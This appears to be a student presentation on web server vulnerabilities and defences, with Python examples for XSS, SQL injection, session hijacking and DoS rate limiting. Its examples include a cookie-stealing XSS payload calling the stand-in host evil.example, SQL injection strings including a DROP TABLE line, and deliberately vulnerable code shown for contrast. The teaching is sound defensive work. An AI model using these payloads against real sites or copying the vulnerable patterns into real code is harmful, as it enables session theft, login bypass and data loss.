WEB SERVER VULNERABILITIES AND SECURITY MEASURES
Members: Vũ Hoàng Đinh Hoàng Phi
Instructor: MSc Nguyễn Duy
Agenda
1. Abstract
2. Current Network Overview
3. Security Exposure
4. Cross Site Scripting
5. SQL Injection
6. Session Hijacking
7. Denial of Service
8. Security Measures
9. Conclusion
Analysis: Current Network Topology

   Finding                                                                Consequence
1  Software firewall is in use                                            Low and inflexible security
2  No web load balancing (LB) or high availability (HA); no AV software   Server overloads rapidly and repeatedly
3  Web server and database server run on the same physical server        Database server security exposure
4  IIS 6.0 in use                                                         Outdated, end-of-life platform in use
5  Server and system vulnerabilities left unpatched                      Web server security exposure
Security Exposure

1. Default configuration (web server): running with the vendor's default configuration makes the system and server an easy target for exploitation.
2. Web application vulnerabilities: an unprotected web application can lead to unmanageable, unusable services.
3. Malicious code (website source code): malicious and unwanted code in the site's own source makes the system vulnerable to attack.
CROSS SITE SCRIPTING

Cross-Site Scripting (XSS) is a type of injection attack in which malicious scripts are injected into otherwise benign and trusted web sites. The injected script runs in the victim's browser with the origin of that site, so it can read any cookies not marked HttpOnly, session tokens, or other sensitive information the browser holds for the site, and can perform actions as the logged-in user. XSS attacks are generally categorized into two main types: stored (the payload is saved on the server, for example in a comment or profile field, and served to every visitor) and reflected (the payload arrives in the request, typically in a crafted link, and is echoed straight back in the response).
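To make the distinction concrete, here is an added Python example (not code from the original slides) of a search page that reflects its query parameter: first the vulnerable version, then the same page with context-aware output encoding. The markup, the attacker payload and the evil.example host are constructed for illustration. The same encode-on-output rule fixes stored XSS; only where the string comes from (database instead of request) differs.

```python
"""Reflected XSS: raw string concatenation versus context-aware output encoding.

Added example, not code from the original slides. The search page markup and the
attacker's payload are constructed for illustration.
"""
import html
from urllib.parse import quote

# Constructed attacker input, as it would arrive in ?q= of a crafted link.
# The leading "> closes an attribute value, so the payload breaks out of
# both the text context and the attribute context in the page below.
PAYLOAD = '"><script>new Image().src="http://evil.example/?c="+document.cookie</script>'


def render_search_unsafe(query: str) -> str:
    """Vulnerable: the query is echoed verbatim into HTML text and an attribute."""
    return (
        '<h1>Results for: ' + query + '</h1>'
        '<input type="text" name="q" value="' + query + '">'
    )


def render_search_safe(query: str) -> str:
    """Hardened: encode for the context each copy of the data lands in.

    html.escape(..., quote=True) turns & < > " ' into entities, which is correct
    for HTML text and for quoted attribute values. The href is a URL context, so
    it gets percent-encoding instead; HTML-escaping there would be the wrong encoding.
    """
    esc = html.escape(query, quote=True)
    url = quote(query, safe='')
    return (
        '<h1>Results for: ' + esc + '</h1>'
        '<input type="text" name="q" value="' + esc + '">'
        '<a href="/search?q=' + url + '">permalink</a>'
    )


def contains_live_script(page: str) -> bool:
    """Demo check: does the rendered page contain a parseable <script> tag?"""
    return '<script' in page.lower()


if __name__ == '__main__':
    print(render_search_unsafe(PAYLOAD))
    print(render_search_safe(PAYLOAD))
```

The unsafe page contains a live script element; in the safe page the same bytes appear only as `&lt;script&gt;` in the text and attribute, and as `%3Cscript%3E` in the link, neither of which the browser executes. Templating engines that auto-escape give the same result by default, but they cannot know about URL or JavaScript contexts, which still need their own encoders.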
SQL INJECTION

SQL injection is an attack in which the attacker exploits weaknesses in how the application builds its database queries: untrusted input is concatenated into the SQL text, so a quote or comment sequence in the input changes the structure of the query itself. Depending on the database and the privileges of the application's account, the attacker can bypass authentication, read or modify table contents, insert or drop tables, or execute commands, typically after first exploring the schema to learn table and column names.
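As an added example (not code from the original slides), the login check below is written twice against an in-memory SQLite database: once by formatting user input into the SQL string, once with bound parameters. The users table, its single row and the attacker inputs are constructed; passwords are stored in clear only so the injection stays visible, a real application stores password hashes.

```python
"""SQL injection: query built by string formatting versus a parameterised query.

Added example, not code from the original slides. The users table, its one row and the
attacker inputs are constructed; the database is an in-memory SQLite instance so the
demo runs offline.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema with a single account."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)')
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!')")
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the inputs become part of the SQL text, so a quote in the input
    ends the string literal and whatever follows is parsed as SQL."""
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: ? placeholders send the inputs as data, never as SQL grammar.
    The same payloads are now just odd usernames that match no row."""
    sql = 'SELECT 1 FROM users WHERE username = ? AND password = ?'
    return conn.execute(sql, (username, password)).fetchone() is not None


# Constructed attacker inputs.
# 1. Comment out the password check and log in as a known user.
BYPASS_USER, BYPASS_PASS = "alice' --", 'anything'
# 2. Tautology: true for every row, no username knowledge needed.
TAUTOLOGY = "' OR '1'='1"


def demo() -> dict:
    """Run both login implementations against the same legitimate and hostile inputs."""
    conn = build_db()
    return {
        'legit_unsafe': login_unsafe(conn, 'alice', 'S3cret!'),
        'legit_safe': login_safe(conn, 'alice', 'S3cret!'),
        'bypass_unsafe': login_unsafe(conn, BYPASS_USER, BYPASS_PASS),
        'bypass_safe': login_safe(conn, BYPASS_USER, BYPASS_PASS),
        'tautology_unsafe': login_unsafe(conn, TAUTOLOGY, TAUTOLOGY),
        'tautology_safe': login_safe(conn, TAUTOLOGY, TAUTOLOGY),
    }


if __name__ == '__main__':
    for name, result in demo().items():
        print(f'{name:18} -> {"LOGGED IN" if result else "rejected"}')
```

Both implementations accept the real credentials; only the formatted query also accepts `alice' --` (the rest of the WHERE clause becomes a comment) and the tautology. One caveat when reproducing the "drop table" case from the slide: Python's sqlite3 module refuses to run more than one statement per execute() call, so a stacked `'; DROP TABLE users; --` fails here with a ProgrammingError. That is a quirk of this driver, not a defence; many other drivers and databases run stacked statements.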
SESSION HIJACKING

Session hijacking is the theft of the session identifier of an active session in order to bypass authentication and gain unauthorized access to the information or services of a system. A user authenticates to the server once by providing a user ID and password; after that the server issues a session identifier, and the user keeps working without having to re-authenticate. An attacker who obtains that identifier (by sniffing unencrypted traffic, through XSS, by guessing a predictable ID, or by planting a known ID in advance, known as session fixation) can present it to the server and impersonate the user without ever logging in, usually without the legitimate user noticing.
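The server-side half of the defence is session management that makes a stolen or planted identifier worthless. The following added Python example (not code from the original slides) issues unguessable IDs, rotates the ID on login so a fixated one is never promoted, enforces idle and absolute timeouts, invalidates on logout, and sets the cookie flags that keep the ID away from scripts and plaintext HTTP. The in-memory store, the injectable clock, the SESSIONID cookie name and the timeout values are illustrative choices.

```python
"""Session management that resists hijacking and fixation.

Added example, not code from the original slides. The session store is an in-memory dict
and the clock is injectable so the timeouts can be exercised deterministically.
"""
import secrets
import time
from typing import Optional

IDLE_TIMEOUT = 15 * 60       # seconds of inactivity after which a session is dead
ABSOLUTE_TIMEOUT = 8 * 3600  # hard lifetime, even for a continuously active session
COOKIE_NAME = 'SESSIONID'    # illustrative name


class SessionManager:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}  # session id -> {'user', 'created', 'last_seen'}

    def login(self, user: str, presented_id: Optional[str] = None) -> str:
        """Issue a fresh identifier on every successful authentication.

        The ID the client presented before logging in (possibly planted by an
        attacker: session fixation) is discarded rather than promoted, and the new
        ID comes from the OS CSPRNG so it cannot be guessed or enumerated.
        """
        if presented_id is not None:
            self._sessions.pop(presented_id, None)
        sid = secrets.token_urlsafe(32)  # 256 bits of randomness
        now = self._clock()
        self._sessions[sid] = {'user': user, 'created': now, 'last_seen': now}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Return the user bound to a live session, or None.

        Idle and absolute timeouts shrink the window in which a stolen ID is usable.
        """
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s['last_seen'] > IDLE_TIMEOUT or now - s['created'] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s['last_seen'] = now
        return s['user']

    def logout(self, sid: str) -> None:
        """Invalidate server-side; clearing the cookie alone leaves a stolen copy valid."""
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    """Set-Cookie value for the session ID.

    HttpOnly: script injected via XSS cannot read it from document.cookie.
    Secure: the browser never sends it over plaintext HTTP, so it cannot be sniffed.
    SameSite=Lax: cross-site requests do not carry it.
    """
    return f'{COOKIE_NAME}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax'


if __name__ == '__main__':
    sm = SessionManager()
    sid = sm.login('alice', presented_id='id-planted-by-attacker')
    print('Set-Cookie:', session_cookie(sid))
    print('user for new id:    ', sm.lookup(sid))
    print('user for planted id:', sm.lookup('id-planted-by-attacker'))
```

Each control closes one theft path: randomness defeats guessing, rotation defeats fixation, HttpOnly and Secure defeat XSS and sniffing respectively, and the timeouts plus server-side logout bound how long a copied ID stays useful. None of them helps if the site is still served over HTTP, which is why Secure presupposes TLS on the whole site.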
DENIAL OF SERVICE

Denial of Service (DoS) is an attack technique with the intent of preventing a web site from serving normal user activity. DoS attacks, which are normally applied at the network layer, are also possible at the application layer. They succeed by starving a system of critical resources (bandwidth, CPU, memory, connections, database handles), by exploiting a vulnerability that crashes or stalls a component, or by abusing legitimate functionality, such as repeatedly invoking an expensive search or login operation.
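Network-layer floods have to be absorbed upstream, but the application-layer variant described above can be blunted at the web tier by limiting how fast any one client may call expensive endpoints. The following added Python example (not code from the original slides) implements a per-client token bucket and replays constructed access-log lines through it: one client floods POST /login a hundred times in a second, another browses normally. The rate and burst figures are illustrative and must be tuned to real traffic; timestamps are seconds relative to the start of the capture so the replay is deterministic.

```python
"""Application-layer DoS mitigation: a per-client token bucket in front of the application.

Added example, not code from the original slides. The access-log lines are constructed
and the RATE/BURST values are illustrative.
"""
import time
from collections import defaultdict

RATE = 5.0    # sustained requests per second allowed per client
BURST = 10.0  # requests a client may send at once before being throttled


class TokenBucketLimiter:
    """Each client has a bucket of BURST tokens refilled at RATE tokens/second; a
    request spends one token and is refused when the bucket is empty. Normal bursty
    browsing is unaffected; a flood drains the bucket and is then held to RATE."""

    def __init__(self, rate: float = RATE, burst: float = BURST, clock=time.monotonic):
        self.rate, self.burst, self._clock = rate, burst, clock
        self._buckets = {}  # client -> (tokens, time of last refill)

    def allow(self, client: str) -> bool:
        now = self._clock()
        tokens, last = self._buckets.get(client, (self.burst, now))
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        allowed = tokens >= 1.0
        if allowed:
            tokens -= 1.0
        self._buckets[client] = (tokens, now)
        return allowed


def replay(log_lines):
    """Replay log lines of the form '<seconds> <client-ip> <request>' through a limiter
    clocked by the log timestamps. Returns {client: {'allowed': n, 'denied': m}}."""
    current = [0.0]
    limiter = TokenBucketLimiter(clock=lambda: current[0])
    stats = defaultdict(lambda: {'allowed': 0, 'denied': 0})
    for line in log_lines:
        ts, client, _request = line.split(' ', 2)
        current[0] = float(ts)
        stats[client]['allowed' if limiter.allow(client) else 'denied'] += 1
    return dict(stats)


# Constructed traffic: 203.0.113.9 sends 100 POST /login within one second (a flood
# against an expensive endpoint); 198.51.100.7 browses normally in the same second.
# Timestamps are fixed-width "0.xx", so a string sort is chronological.
SAMPLE_LOG = sorted(
    [f'{i / 100:.2f} 203.0.113.9 POST /login' for i in range(100)]
    + ['0.10 198.51.100.7 GET /',
       '0.45 198.51.100.7 GET /style.css',
       '0.90 198.51.100.7 POST /login']
)

if __name__ == '__main__':
    for client, counts in replay(SAMPLE_LOG).items():
        print(client, counts)
```

The flooding client gets its burst of ten plus roughly five more over the second and is refused the remaining eighty-odd requests, while the normal client is never touched. In production this logic usually lives in the reverse proxy or WAF rather than the application (Apache's mod_evasive and nginx's limit_req do the same job), and the key should be chosen with care: limiting per source IP penalises users behind a shared NAT and does nothing against a distributed flood.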
Security Measures

Web Server
- Define appropriate policies for your own needs.
- Update the server periodically so the system receives the full and final fixes.

Web Application
- Use ModSecurity.
- Check the logs frequently and apply the rules the logs show to be needed.

Source Code
- Modify the source code as required to prevent the attacks identified.
- Apply the latest patches to fix known vulnerabilities.
Web Server: User and Password Policy
Web Server: System Patches
Minimize the software installed. Every package the server does not need is attack surface that still has to be patched; list what is present and remove what is not required. On a yum-based system:

# yum list installed        (list every package currently installed)
# yum list packageName      (check whether a given package is installed or available)
# yum remove packageName    (remove a package the server does not need)
Web Server: Change Default Port
Web Application: ModSecurity Overview
- Attack prevention and just-in-time (virtual) patching
- Real-time monitoring and attack detection
- Flexible rule engine

ModSecurity is an open source web application firewall, originally developed by Ivan Ristić for the Apache web server.
Web Application – ModSecurity: Prevent Cross Site Scripting (XSS)
Web Application – ModSecurity: Prevent SQL Injection
Web Application – ModSecurity: Prevent DDoS Attacks
Web Application: Prevent Session Hijacking
Conclusion
1. Applications, testing and prevention evolve, but so do hacking and exploitation.
2. Administrators must always keep their eyes open for available updates, fixes and patches.
3. There is no unbreakable website; there are only promptly updated websites and active, attentive administrators.

The three layers to secure: Web Server, Web Application, Source Code.

THANK YOU!